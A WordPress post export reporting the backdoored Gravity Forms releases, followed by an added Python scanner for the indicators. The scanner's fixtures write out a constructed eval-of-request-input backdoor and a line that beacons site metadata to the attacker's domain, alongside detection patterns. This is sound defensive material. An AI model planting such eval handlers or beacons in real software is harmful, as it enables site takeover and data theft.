{"id":12304,"date":"2025-07-19T17:27:03","date_gmt":"2025-07-19T17:27:03","guid":{"rendered":"https:\/\/usaontheweb.com\/clone1\/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins\/"},"modified":"2025-07-19T17:27:03","modified_gmt":"2025-07-19T17:27:03","slug":"wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins","status":"publish","type":"post","link":"https:\/\/usaontheweb.com\/clone1\/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins\/","title":{"rendered":"WordPress Gravity Forms developer hacked to push backdoored plugins"},"content":{"rendered":"<div>\n<p>The popular WordPress plugin Gravity Forms has been compromised in what appears to be a supply-chain attack: manual installers offered on the official website were infected with a backdoor.<\/p>\n<p>Gravity Forms is a premium plugin for creating contact, payment, and other online forms. According to the vendor's own statistics, the product is installed on around one million websites, some belonging to well-known organizations such as Airbnb, Nike, ESPN, Unicef, Google, and Yale.<\/p>\n<h3>Remote code execution on the server<\/h3>\n<p>WordPress security firm Patchstack says it received a report earlier today about suspicious requests generated by plugins downloaded from the Gravity Forms website.<\/p>\n<p>After examining the plugin, Patchstack confirmed that the copy it received contained a malicious file (gravityforms\/common.php) that had been downloaded from the vendor&#8217;s website. 
Closer examination revealed that the file initiated a POST request to a suspicious endpoint, \u201cgravityapi.org\/sites.\u201d<\/p>\n<p>Upon further analysis, the researchers found that the plugin collected extensive site metadata, including the site URL, admin path, active theme, installed plugins, and PHP and WordPress versions, and exfiltrated it to the attackers.<\/p>\n<p>The server response includes base64-encoded PHP malware, which is saved as \u201cwp-includes\/bookmark-canonical.php.\u201d<\/p>\n<p>The malware masquerades as a WordPress content management tool and enables remote code execution without authentication through functions such as \u2018handle_posts(),\u2019 \u2018handle_media(),\u2019 and \u2018handle_widgets().\u2019<\/p>\n<p>\u201cAll of those functions can be called from __construct -> init_content_management -> handle_requests -> process_request function. So, it basically can be triggered by an unauthenticated user,\u201d Patchstack explains.<\/p>\n<p>\u201cFrom all of the functions, it will perform an eval call with the user-supplied input, resulting in remote code execution on the server,\u201d the researchers said.<\/p>\n<p>RocketGenius, the developer behind Gravity Forms, was informed of the issue, and a staff member told Patchstack that the malware affected only manual downloads and Composer installations of the plugin.<\/p>\n<p>Patchstack recommends that anyone who downloaded Gravity Forms starting yesterday obtain a clean copy and reinstall the plugin. 
Admins should also scan their websites for any signs of infection.<\/p>\n<p>According to Patchstack, the domains used in this operation were registered on July 8.<\/p>\n<h3>Hackers add admin account<\/h3>\n<p>RocketGenius has published a post-mortem of the incident confirming that only Gravity Forms 2.9.11.1 and 2.9.12, as available for manual download between July 10 and 11, were compromised.<\/p>\n<p>Admins who ran a Composer install of version 2.9.11 on either of those two dates also received an infected copy of the product.<\/p>\n<p>&#8220;The Gravity API service that handles licensing, automatic updates, and the installation of add-ons initiated from within the Gravity Forms plugin was never compromised. All package updates managed through that service are unaffected&#8221; &#8211; RocketGenius<\/p>\n<p>RocketGenius says that the malicious code blocked update attempts, contacted an external server to fetch additional payloads, and added an admin account that gave the attacker complete control of the website.<\/p>\n<p>The developer also provides methods for administrators to check for possible infection by following specific links on their own websites.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>The popular WordPress plugin Gravity Forms has been compromised in what appears to be a supply-chain attack where manual installers 
from<\/p>\n","protected":false},"author":7282,"featured_media":12305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1166],"tags":[],"class_list":["post-12304","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-website"],"_links":{"self":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts\/12304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/users\/7282"}],"replies":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/comments?post=12304"}],"version-history":[{"count":0,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/posts\/12304\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/media\/12305"}],"wp:attachment":[{"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/media?parent=12304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/categories?post=12304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/usaontheweb.com\/clone1\/wp-json\/wp\/v2\/tags?post=12304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
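The article tells admins to scan their sites for signs of infection and names the concrete indicators: the trojanised gravityforms/common.php beaconing to gravityapi.org, the dropped wp-includes/bookmark-canonical.php, the handle_posts/handle_media/handle_widgets handlers that eval() request input, and the two release versions (2.9.11.1 and 2.9.12) served backdoored on July 10 and 11. The scanner below turns those into an offline filesystem check. It is an added example, not Patchstack's or RocketGenius's tooling. It assumes a standard WordPress layout (wp-content/plugins/gravityforms, wp-includes) and the standard "Version:" plugin header in gravityforms/gravityforms.php; the fixture trees built by build_sample_tree() are constructed for this example and are not real site contents.

```python
"""Offline scanner for the Gravity Forms backdoor indicators described above.
Added example, not vendor or Patchstack tooling. Assumes a standard WordPress
tree and the standard "Version:" plugin header; fixture data is constructed."""
import json
import re
import sys
import tempfile
from pathlib import Path
from typing import Optional

AFFECTED_VERSIONS = {"2.9.11.1", "2.9.12"}            # RocketGenius post-mortem
C2_DOMAIN = "gravityapi.org"                           # Patchstack analysis
DROPPED_FILE = Path("wp-includes") / "bookmark-canonical.php"
HANDLER_NAMES = ("handle_posts", "handle_media", "handle_widgets")
EVAL_RE = re.compile(r"\beval\s*\(")
VERSION_RE = re.compile(r"^\s*\*?\s*Version:\s*([\w.\-]+)", re.M)


def plugin_version(plugin_dir: Path) -> Optional[str]:
    """Read the Version: header from gravityforms/gravityforms.php, if present."""
    main = plugin_dir / "gravityforms.php"
    if not main.is_file():
        return None
    m = VERSION_RE.search(main.read_text(errors="replace"))
    return m.group(1) if m else None


def scan(webroot: Path) -> list:
    """Return one finding dict per indicator hit; an empty list means none seen."""
    findings = []
    plugin_dir = webroot / "wp-content" / "plugins" / "gravityforms"

    def report(severity, path, reason):
        findings.append({"severity": severity,
                         "path": path.relative_to(webroot).as_posix(),
                         "reason": reason})

    dropped = webroot / DROPPED_FILE
    if dropped.exists():
        report("high", dropped, "dropped payload file from the Patchstack report is present")

    common = plugin_dir / "common.php"
    if common.is_file() and C2_DOMAIN in common.read_text(errors="replace"):
        report("high", common, f"references attacker-controlled domain {C2_DOMAIN}")

    version = plugin_version(plugin_dir)
    if version in AFFECTED_VERSIONS:
        report("review", plugin_dir / "gravityforms.php",
               f"version {version} was served backdoored via manual download on "
               "July 10-11; confirm how and when this copy was obtained")

    # Signature of the dropped backdoor: the handler names next to eval().
    # Checked in every PHP file, not just the reported path, since only the
    # attacker controlled the file name.
    for php in sorted(webroot.rglob("*.php")):
        text = php.read_text(errors="replace")
        if EVAL_RE.search(text) and sum(n in text for n in HANDLER_NAMES) >= 2:
            report("high", php, "eval() alongside the handle_posts/handle_media/"
                                "handle_widgets handlers")
    return findings


BACKDOOR_SAMPLE = """<?php
// constructed stand-in for the dropped file: same handler names and
// eval-of-request-input shape that Patchstack described, nothing more
class Content_Management_Tools {
    public function handle_posts($r)   { eval($r['data']); }
    public function handle_media($r)   { eval($r['data']); }
    public function handle_widgets($r) { eval($r['data']); }
}
"""


def build_sample_tree(infected: bool = True) -> Path:
    """Constructed fixture (not a real site): a minimal WordPress tree, with or
    without the indicators. The clean tree carries a placeholder version."""
    root = Path(tempfile.mkdtemp(prefix="gf-scan-"))
    plugin = root / "wp-content" / "plugins" / "gravityforms"
    plugin.mkdir(parents=True)
    (root / "wp-includes").mkdir()
    version = "2.9.12" if infected else "0.0.0-fixture"
    (plugin / "gravityforms.php").write_text(
        f"<?php\n/*\nPlugin Name: Gravity Forms\nVersion: {version}\n*/\n")
    common = "<?php\nfunction gf_fixture_helper() { return 1; }\n"
    if infected:  # the reported beacon: site metadata POSTed to gravityapi.org/sites
        common += "wp_remote_post('https://gravityapi.org/sites', array('body' => $meta));\n"
    (plugin / "common.php").write_text(common)
    (root / "wp-includes" / "functions.php").write_text("<?php\nfunction wp_fixture() {}\n")
    if infected:
        (root / DROPPED_FILE).write_text(BACKDOOR_SAMPLE)
    return root


if __name__ == "__main__":
    # usage: python gf_scan.py /var/www/html   (no argument: scan the infected fixture)
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_tree()
    for finding in scan(target):
        print(json.dumps(finding))
```

The version hit is reported as "review" rather than "high" on purpose: 2.9.12 obtained through the Gravity API updater is clean according to RocketGenius, so the version string alone only tells you which installs to look at more closely. Because the backdoor also created an administrator account, pair the file scan with a user audit, for example `wp user list --role=administrator --fields=ID,user_login,user_registered` (a standard WP-CLI command), and treat any administrator registered on or after July 10 that nobody recognises as a sign the site needs a full rebuild from a clean copy, not just a plugin reinstall.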